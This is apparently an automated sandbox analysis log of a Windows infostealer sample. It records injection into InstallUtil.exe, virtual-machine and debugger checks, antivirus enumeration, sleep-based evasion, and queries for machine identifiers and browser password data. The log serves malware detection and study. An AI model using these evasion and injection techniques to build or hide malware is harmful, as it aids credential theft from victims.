      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\analworkerJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7C29.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/12@1/3
      Source: tmp7C29.tmp.dat.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Mutex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: file.exeStatic file information: File size 1219328 > 1048576
      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\admin\Desktop\worka\sourse\Obladet\obladaet\bin\Release\Secured\imageviewer.pdb source: file.exe, 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmp, InstallUtil.exe, 00000002.00000002.445600620.0000000000402000.00000040.00000400.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9A56 push ecx; ret 0_2_001A9A69
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02AB4B18 pushfd ; ret 2_2_02AB4B21
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02ABAC91 push E8000000h; ret 2_2_02ABACA9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0552718D push esp; iretd 2_2_0552718E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055272D2 pushad ; iretd 2_2_055272D3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05526FFE push eax; iretd 2_2_05526FFF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05527ADD pushfd ; iretd 2_2_05527ADE
      Source: file.exeStatic PE information: section name: .D_Haze
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 5001
      Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49708
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -100000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5744Thread sleep count: 3421 > 30Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -99840s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -99719s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -99563s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -99453s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5876Thread sleep time: -99344s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5888Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3421Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BE3A0 FindFirstFileExW,0_2_001BE3A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99840Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99719Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99563Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99453Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99344Jump to behavior
      Source: InstallUtil.exe, 00000002.00000003.363043019.0000000006893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
      Source: file.exe, 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmp, InstallUtil.exe, 00000002.00000002.445600620.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ,,ComputeStringHash<ContainsVirtualMachineKeywords>b__0<Create>b__0<Create>b__1<Create>b__2<Create>b__3<Create>b__4<Create>b__5<Create>b__6<Create>b__7<Create>b__8<Create>b__9<Create>b__10<Create>b__11Dispose<Run>b__0get_Nameset_Name
      Source: file.exe, 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmp, InstallUtil.exe, 00000002.00000002.445600620.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: <ContainsVirtualMachineKeywords>b__0
      Source: InstallUtil.exe, 00000002.00000003.362792850.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: InstallUtil.exe, 00000002.00000003.363043019.0000000006893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareEUTXF8_5Win32_VideoControllerBX9CLBDXVideoController120060621000000.000000-00059815286display.infMSBDA6GB5NFMWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsFNW8KX9_
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AA085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AA085
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C1B1A GetProcessHeap,0_2_001C1B1A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BF51B mov eax, dword ptr fs:[00000030h]0_2_001BF51B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B3E39 mov ecx, dword ptr fs:[00000030h]0_2_001B3E39
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02AB9540 LdrInitializeThunk,2_2_02AB9540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AA1E7 SetUnhandledExceptionFilter,0_2_001AA1E7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AA085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AA085
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AFC47 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AFC47
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9D60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001A9D60

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 430000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B68008Jump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001C18B8
      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001C11F6
      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001C1241
      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001C12DC
      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_001C1367
      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001B8C2E
      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001C15BA
      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001C16E3
      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001B8708
      Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_001C0F54
      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001C17E9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9B4C cpuid 0_2_001A9B4C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9F7F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001A9F7F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

